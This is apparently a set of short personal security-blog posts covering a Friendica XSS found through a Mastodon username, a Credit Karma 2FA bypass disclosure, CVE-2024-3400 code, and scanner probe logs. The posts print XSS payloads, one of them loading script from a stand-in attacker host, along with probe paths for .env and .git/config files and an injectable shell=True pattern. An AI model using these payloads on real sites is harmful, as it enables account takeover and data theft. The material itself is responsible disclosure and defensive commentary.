infosec
-
Screenshot your LinkedIn app home screen.
-
Make a web page with that background.
-
Add a link at the top to display the QR code of your choice.
-
Add a link to that on your home screen.
- Log in with my username and password.
- Try the 2FA challenge once and let it fail.
- Navigate to accounts.creditkarma.com
- Defending your AI assets
- Defending your assets from AI
- Defending your assets with AI
- Prompt injection for lolz and cash
- Lacks end-to-end encryption
- An attacker (me, by accident, in this case) could exploit the vulnerability without having any access to those Friendica instances.
- The attack was simple: I changed my username to a bit of valid JavaScript.
- All I had to do to trigger the vulnerability was to get my username to show up on the victim’s screen. If I sent them a message, or if any of their friends saw and boosted my message so that it appeared in the victim’s timeline, then the trap was sprung.
- My little joke was annoying but harmless. A malicious attacker could just as easily change their username to
- The malicious JavaScript could do literally anything with the victim’s account that the victim could do. It could look at all their private messages and upload them to another server, or change their password, or message all of their friends, or change their own username to be another bit of malicious JavaScript and start a chain reaction.
-
Because this is how we do it, OK? It’s fine to enjoy that moment of discovery, but when you find a broken window, you let someone know so they can fix it. You don’t go in. And you never, ever use that knowledge to hurt people. ↩︎
-
Exact quote from the conversation: “You have the ability to do the funniest thing in history!” That’s overselling it, but I appreciated their enthusiasm. ↩︎
In March, Waltz came under scrutiny after he put together a Signal chat and mistakenly included The Atlantic’s Jeffrey Goldberg, disclosing discussions with top national security officials about plans for a military strike on Houthi targets in Yemen.
Part of being a security adviser is being, you know, competent at security.
Voila. Now you can make anyone at any tech conference open the QR code of your choosing. “Hey, let’s be buddies!”
How to bypass Credit Karma's 2FA
Locked out of your Credit Karma account’s 2FA? No problem! Here’s how I can log into mine:
Ta-da! I’m in. I reported this a month ago but they haven’t acknowledged it as an issue yet. If I stumbled across this, you can bet the bad guys are already using it.
2025-03-17: I report a critical vulnerability (trivial, complete 2FA bypass) to a well-known company’s security email alias. No reply.
2025-04-07: I report it again to their bug bounty program.
2025-04-09: They close it as a duplicate.
Their bug bounty program says, basically, “we never disclose reports. Don’t discuss them with anyone.”
23 days into this episode, I’m starting to weigh the responsible thing to do here.
AWS WAF now uses /64s instead of /128s for IPv6 rate-limit bucketing. That’s a huge and welcome improvement!
Credit Karma stopped accepting my decade-old Google Voice phone number for 2FA. It won’t let me change to use my regular number because we were already using that for my wife’s account (which she asked me to manage for her). Their support’s idea for resolving this? Just ask Verizon for a new temporary phone number each month or so forever.
Um, no.

The coffee shop is fine
I hear too many acquaintances worry that employees might work from a coffee shop or other public network, putting their whole company at risk. So what if they do? The idea that a coffee shop’s Wi-Fi is insecure implies that there’s a mythical “secure” network that can be trusted with the company’s secrets. That’s almost never true.
Work-from-home employees are on a tame home Wi-Fi setup, right? Don’t count on it. Is their gear current? Are they sharing Wi-Fi with their neighbors? Are they using their apartment building’s network? Who’s their ISP? Although their home setup might – or might not – have fewer people on it than the local cafe’s, that doesn’t make it trustworthy.
What about the employees we coerced into returning to a legacy office and using its Wi-Fi? Oh. You mean that named network that sits around with a target on its back as belonging to important people? Unless you manage your own office, and it’s in a Faraday cage blocking all outbound or inbound radio signals, and you pretend that MAC filtering is a security feature, and all your equipment is patched with the latest security updates, and you have guards walking around with fox hunt antennas to spot rogue access points, it’s not substantially better in the ways that count. If you can read this at work, at least a few of those assumptions are likely wrong.
The idea of a “trusted network” is dead. It’s time we stop pretending. If an employee can be compromised at the coffee shop, they can be compromised at the office. We have to design our defenses as though our staff are working from the free network at DEF CON. That means making sure all employee devices and servers are patched. That all connections are encrypted, even those between internal systems. That authentication uses cryptography, not passwords. That we don’t pretend that “route all traffic” VPNs are a good idea. That we don’t rely on allowlisted IPs as a critical defense. That we don’t trust any network our employees might use, and that our systems are robust enough to endure hostile environments. Yes, even the ones we tell ourselves are safe.
And if we’re not comfortable with our coworkers typing away next to a fresh latte, it’s our responsibility to figure out what part of that bothers us and then fix it. The issues that would make that scenario dangerous affect the “secure” office, too.
The email: Click here to enhance your account’s security with two-factor authentication!
Click.
The website: Please enter your phone number to receive your access code.
Cmd-W.
When a coworker forwards you an email to ask if it looks like phishing, take a moment to publicly praise them for it. “Jane sent me an example of a new phishing campaign going around. Her instinct to let us know about it was exactly right. Thanks, Jane!” Reinforce the idea that Security has their back and will be pleasant to interact with. That’s how you get them to want to report things.
Polyfill supply chain attack hits 100K+ sites:
The
polyfill.js
is a popular open source library to support older browsers. 100K+ sites embed it using thecdn.polyfill.io
domain. Notable users are JSTOR, Intuit and World Economic Forum. However, in February this year, a Chinese company bought the domain and the Github account. Since then, this domain was caught injecting malware on mobile devices via any site that embedscdn.polyfill.io
.
This is fine.
This is interesting and dangerous. I’m trying the new macOS Sequoia Passwords app. I exported my passwords from 1Password to a CSV and imported them into the new app, then soon saw a bunch of ancient logins from old employers. What? Searching for them in 1Password found nothing.
Oh, turns out those are archived in 1Password. The normal cmd-F search doesn’t look in Archive even if you’ve selected it. The other opt-cmd-F find does.
Hope you remembered to delete the passwords that would get you beaten up.
Little Snitch 6 came out yesterday with many quality of life improvements.
It’s always the first app I install on a new Mac. New versions are no-brainer upgrades for me. I still wish it had a way to sync rulesets between Macs so that I don’t have to train each one independently.
I am not exaggerating this:
I created a new hostname in DNS, then added it to my existing webserver config.
It was online for 3 seconds – 3! – before getting a 404 request for /.git/config
.
If you’re relying on obscurity to protect your services, get that right out your fool head today. You have about 3 seconds to get your act together.
In the time it took me to type this, I got another 62 requests:
30 "/"
3 "/.git/config"
2 "/.vscode/sftp.json"
2 "/v2/_catalog"
2 "/telescope/requests"
2 "/server-status"
2 "/server"
2 "/s/431323e2230323e2134323e2239313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"
2 "/?rest_route=/wp/v2/users/"
2 "/login.action"
2 "/.env"
2 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"
2 "/.DS_Store"
2 "/debug/default/view?panel=config"
2 "/config.json"
2 "/_all_dbs"
2 "/about"
You know how sometimes you come to decide that an entire niche market is so filled with awful and overpriced alternatives that you’d rather just write your own and give it away for free?
My toes are on the precipice.
Conference tracks where more than a few people are wearing khaki:
Additional conference tracks where more than a few people have primary colored hair:
Palo Alto's exploited Python code
watchTowr Labs has a nice blog post dissecting CVE-2024-3400. It’s very readable. Go check it out.
The awfulness of Palo Alto’s Python code in this snippet stood out to me:
def some_function():
...
if source_ip_str is not None and source_ip_str != "":
curl_cmd = "/usr/bin/curl -v -H \"Content-Type: application/octet-stream\" -X PUT \"%s\" --data-binary @%s --capath %s --interface %s" \
%(signedUrl, fname, capath, source_ip_str)
else:
curl_cmd = "/usr/bin/curl -v -H \"Content-Type: application/octet-stream\" -X PUT \"%s\" --data-binary @%s --capath %s" \
%(signedUrl, fname, capath)
if dbg:
logger.info("S2: XFILE: send_file: curl cmd: '%s'" %curl_cmd)
stat, rsp, err, pid = pansys(curl_cmd, shell=True, timeout=250)
...
def dosys(self, command, close_fds=True, shell=False, timeout=30, first_wait=None):
"""call shell-command and either return its output or kill it
if it doesn't normally exit within timeout seconds"""
# Define dosys specific constants here
PANSYS_POST_SIGKILL_RETRY_COUNT = 5
# how long to pause between poll-readline-readline cycles
PANSYS_DOSYS_PAUSE = 0.1
# Use first_wait if time to complete is lengthy and can be estimated
if first_wait == None:
first_wait = PANSYS_DOSYS_PAUSE
# restrict the maximum possible dosys timeout
PANSYS_DOSYS_MAX_TIMEOUT = 23 * 60 * 60
# Can support upto 2GB per stream
out = StringIO()
err = StringIO()
try:
if shell:
cmd = command
else:
cmd = command.split()
except AttributeError: cmd = command
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, bufsize=1, shell=shell,
stderr=subprocess.PIPE, close_fds=close_fds, universal_newlines=True)
timer = pansys_timer(timeout, PANSYS_DOSYS_MAX_TIMEOUT)
It uses string building to create a curl
command line. Then it passes that command line down into a function that calls subprocess.Popen(cmd_line, shell=True)
. What? No! Don’t ever do that!
I fed that code into the open source bandit static analyzer. It flagged this code with a high severity, high confidence finding:
ᐅ bandit pan.py
[main] INFO profile include tests: None
[main] INFO profile exclude tests: None
[main] INFO cli include tests: None
[main] INFO cli exclude tests: None
[main] INFO running on Python 3.12.1
Run started:2024-04-16 17:14:52.240258
Test results:
>> Issue: [B604:any_other_function_with_shell_equals_true] Function call with shell=True parameter identified, possible security issue.
Severity: Medium Confidence: Low
CWE: CWE-78 (https://cwe.mitre.org/data/definitions/78.html)
More Info: https://bandit.readthedocs.io/en/1.7.8/plugins/b604_any_other_function_with_shell_equals_true.html
Location: ./pan.py:14:26
13 logger.info("S2: XFILE: send_file: curl cmd: '%s'" % curl_cmd)
14 stat, rsp, err, pid = pansys(curl_cmd, shell=True, timeout=250)
15
--------------------------------------------------
>> Issue: [B602:subprocess_popen_with_shell_equals_true] subprocess call with shell=True identified, security issue.
Severity: High Confidence: High
CWE: CWE-78 (https://cwe.mitre.org/data/definitions/78.html)
More Info: https://bandit.readthedocs.io/en/1.7.8/plugins/b602_subprocess_popen_with_shell_equals_true.html
Location: ./pan.py:49:8
48 bufsize=1,
49 shell=shell,
50 stderr=subprocess.PIPE,
51 close_fds=close_fds,
52 universal_newlines=True,
53 )
54 timer = pansys_timer(timeout, PANSYS_DOSYS_MAX_TIMEOUT)
--------------------------------------------------
Code scanned:
Total lines of code: 41
Total lines skipped (#nosec): 0
Run metrics:
Total issues (by severity):
Undefined: 0
Low: 0
Medium: 1
High: 1
Total issues (by confidence):
Undefined: 0
Low: 1
Medium: 0
High: 1
Files skipped (0):
From that we can infer that Palo Alto does not use effective static analysis on their Python code. If they did, this code would not have made it to production.
Veilid in The Washington Post
I’ve been helping on a fun project with some incredibly brilliant friends. I found myself talking about it to a reporter at The Washington Post. The story just came out. My part was crucial, insightful, and far, far down the page:
Once known for distributing hacking tools and shaming software companies into improving their security, a famed group of technology activists is now working to develop a system that will allow the creation of messaging and social networking apps that won’t keep hold of users’ personal data. […] “It’s a new way of combining [technologies] to work together,” said Strauser, who is the lead security architect at a digital health company.
You bet I’m letting this go to my head.
At work: “Kirk, I think you’re wrong.” “Well, one of us was featured in WaPo, so we’ll just admit that I’m the expert here.”
At home: “Honey, can you take the trash out?” “People in The Washington Post can’t be expected to just…” “Take this out, ‘please’.”
But really, Veilid is incredibly neat and I’m awed by the people I’ve been lucky to work with. Check it out after the launch next week at DEF CON 31.
I use Things without encryption
Update 2023-11-03: No, I don’t.
I tell people not to use Readdle’s Spark email app. Then I turn around and use the Things task manager, which lacks end-to-end encryption (E2EE). That concerns me. I have a PKM note called “Task managers”, and under “Things” my first bullet point is:
I realize I’m being hypocritical here, but perhaps only a little bit. There’s a difference in exposure between Things and, say, my PKM notes, archive of scanned documents, email, etc.:
I don’t put highly sensitive information in Things. No, I don’t want my actions in there to be public, but they’re generally no more detailed than “make an allergist appointment” or “ask boss about a raise”. I know some people use Things as a general note-taking app but I don’t. There are other apps more tailored to that and I use them instead.
I control what information goes into Things. If my doctor were to email me sensitive medical test results, the Spark team could hypothetically read them. Cultured Code can only view what I personally choose to put into Things. (That glosses over the “Mail to Things” feature, but I never give that address to anyone else and I don’t worry about it being misused.)
Things can’t impersonate me. Readdle could use my email credentials to contact my boss and pretend to be me. Now, I’m confident that they won’t. They’re a good, reputable company. But they could, and that’s enough to keep me away from Spark.
Finally, Cultured Code is a German company covered by the GDPR. They have strong governmental reasons not to do shady stuff with my data.
While I don’t like that Things lacks E2EE, and I wish that it had it, the lack isn’t important enough for how I want to use it to keep me away from it. There are more secure alternatives like OmniFocus and Reminders, but the benefits that I get from Things over those options makes it worthwhile for me to hold my nose and use it.
Everyone has to make that decision based on their own usage. If you have actions like “send government documents to reporter” or “call patient Amy Jones to tell her about her cancer”, then you shouldn’t use Things or anything else without E2EE. I’d be peeved if my Things actions were leaked, but it wouldn’t ruin my life or get me fired.
But I know I should still look for something more secure.
Accidentally Hacking the Planet
Last summer I tried to hack the Wall of Sheep at DEF CON. It didn’t work. The short version is that I tried to make a Cross Site Scripting (XSS) attack against the Wall by crafting a username:
<script type="text/javascript">alert("I was here.");</script>
Because I’m kind of a smartass, I later changed my Mastodon username to something similar:
<script>alert("Tek");</script>
Then I laughed about it with my geeky friends and promptly forgot all about the joke.
And then late at night on Mother’s Day Eve this year, some people started sending me messages like “why is your name popping up on my screen?” and “please make that stop” and “DUDE NO REALLY PLEASE STOP IT”. I had another laugh and tried to go to sleep, until I realized, oh, this isn’t good. Those people were all on various Friendica instances, and when my username came across their timeline, the server software was incorrectly embedding it in the HTML as a real <script>
tag instead of displaying it as the literal text <script>alert("Tek");</script>
. In the web world, that’s about as bad as an attack can get. The US government’s CVSS calculator scored it as a perfect 10.0.
<script src="https://hackerz.ru/badstuff.js">Hi</script>
That wasn’t funny at all. I got up and dashed off an email to Friendica’s security email address. I also found that some of the people I’d been talking to via Mastodon were Friendica maintainers, and I messaged them with my concerns.1 Satisfied that the right people had been notified, I went back to bed.
The next morning I told my wife and kid about the unexpected evening I’d had. My kid instantly piped up with “Dad! Dad! You should change it to a Rickroll!”2
My jaw hit the floor. Yes, of course. It must be done. My amazing wife egged me on by insisting that as it was Mother’s Day, I owed this to her. After a little experimentation, I came up with a new username:
<script>window.location="https://is.gd/WVZvnI#TekWasHere"</script>
It was a little longer than the maximum of 30 characters that Mastodon allows you to enter, but since I have direct access to my Mastodon instance’s database, it was easy to work around that limit.
I began receiving new messages that I’m pretty sure were all in good humor. Well, somewhat sure.
To their vast credit, the Friendica gang pounced on the problem quickly. Some instances rolled out a preliminary fix later that day. A week after, the team rolled out a new public release so that all other Friendica admins could patch their systems.
It’s easy to make a mistake. That’s inevitable. The world would be better if everyone reacted like the Friendica maintainers, by asking questions, finding a solution, then quickly fixing those mistakes. Well done.
The Internet is a rough neighborhood
This week I stood up a new firewall in front of my home network. This one has much better logging than the old one, and I’ve been watching the block reports.

Real talk, friends: DO. NOT. expose a machine to the open Internet unless you’re 100% confident it’s bulletproof.
“I run my service on a custom port!” Doesn’t matter.
“I use IPv6!” Doesn’t matter.
“I’m just a nobody!” Doesn’t matter.
Practice safer networking, every time, all the time.